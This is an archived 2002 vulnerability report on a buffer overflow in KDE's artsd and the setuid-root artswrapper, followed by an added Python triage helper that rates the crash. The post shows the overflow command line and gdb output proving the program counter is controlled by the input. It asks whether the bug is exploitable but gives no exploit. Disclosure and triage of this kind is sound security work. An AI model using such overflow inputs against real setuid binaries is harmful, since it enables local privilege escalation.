artsd overflow

2002-01-04T00:00:00
ID SECURITYVULNS:DOC:2325
Type securityvulns
Reporter Securityvulns
Modified 2002-01-04T00:00:00

Description

-----BEGIN PGP SIGNED MESSAGE-----

Happy new year.

Take a look at this:

r00t:~$ ls -las `which artswrapper` `which artsd`
   4 -rwsr-xr-x    1 root     root     4048 Dec 28 22:43 /usr/bin/artswrapper
 120 -rwxr-xr-x    1 root     root   117644 Dec 28 22:43 /usr/bin/artsd

r00t:~$ artsd -m `perl -e 'print "A"x3000'`
Segmentation fault

r00t:~$ gdb artsd
GNU gdb 5.1
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-linux"...(no debugging symbols found)...
(gdb) r -m `perl -e 'print "A"x3000'`
Starting program: /usr/bin/artsd -m `perl -e 'print "A"x3000'`
- - -----------cut--------------
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1024 (LWP 11372)]
0x41414141 in ?? ()

r00t:~$ artswrapper -m `perl -e 'print "A"x3000'`
>> running as realtime process now (priority 50)
Segmentation fault

Is this exploitable?

r00t:~$ dpkg -s libarts | grep Version
Version: 4:2.2.2-10

Using Debian Sid.


Linux registered User #142704
PGP key: http://www.keyserver.net:11371/pks/lookup?search=Fuska&op=get
Fingerprint = F6B3 B665 95FA B9D0 13FD 72D5 5106 22F7 58BD 7EDE

You impose the law of silence on me because you are afraid that this, your world, is not the best of worlds but the worst, the most sordid. - Dario Fo

You are in a dark room with a compiler, emacs, an internet connection, and a thermos of coffee. Your move?

-----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use MessageID: 4q2WLd8+MvqQK9xhebZuGUc7ZoVx6F/z

iQA/AwUAPDUKDFEGIvdYvX7eEQK+mwCglluFmjdk/L3YvHl40iUIReX1s+4AoJkm WvVT8je7pBYymCdaaGbTUr0H =P17j -----END PGP SIGNATURE-----
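
An added example, not part of the original post: a small triage helper that reads the two facts the session above establishes (the setuid bit in the `ls -las` output and the faulting address gdb reports) and rates the crash. The sample input is constructed from the lines quoted in the post; the function names and severity wording are assumptions of this example.

```python
import re

# Constructed sample input: the relevant lines of the session quoted in the post.
LS_OUTPUT = """\
   4 -rwsr-xr-x    1 root     root     4048 Dec 28 22:43 /usr/bin/artswrapper
 120 -rwxr-xr-x    1 root     root   117644 Dec 28 22:43 /usr/bin/artsd
"""
GDB_OUTPUT = """\
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1024 (LWP 11372)]
0x41414141 in ?? ()
"""

def setuid_root_binaries(ls_text):
    """Return paths whose mode has the setuid bit and whose owner is root."""
    found = []
    for line in ls_text.splitlines():
        fields = line.split()
        # ls -las layout: blocks mode links owner group size month day time path
        if len(fields) >= 10 and fields[1][3] in "sS" and fields[3] == "root":
            found.append(fields[-1])
    return found

def faulting_pc(gdb_text):
    """Return the program counter gdb reports for the fault, or None."""
    m = re.search(r"^(0x[0-9a-fA-F]+) in ", gdb_text, re.MULTILINE)
    return int(m.group(1), 16) if m else None

def pc_from_input(pc, fill_byte, width=4):
    """True when every byte of the faulting PC equals the input fill byte."""
    if pc is None or pc >= 256 ** width:
        return False
    return pc.to_bytes(width, "little") == bytes([fill_byte]) * width

def triage(ls_text, gdb_text, fill_byte=ord("A")):
    """Combine both observations into one rating (labels are this example's own)."""
    pc = faulting_pc(gdb_text)
    controlled = pc_from_input(pc, fill_byte)
    suid = setuid_root_binaries(ls_text)
    if controlled and suid:
        severity = "high: input-controlled PC and a setuid root binary in the path"
    elif controlled:
        severity = "medium: input-controlled PC, no setuid binary seen"
    else:
        severity = "low: crash only"
    return {"pc": pc, "pc_from_input": controlled, "setuid_root": suid, "severity": severity}

if __name__ == "__main__":
    print(triage(LS_OUTPUT, GDB_OUTPUT))
```

The rating is only as good as its inputs: the post does not show whether artswrapper still holds root privileges at the point of the crash, so that has to be confirmed separately before the "high" label is trusted.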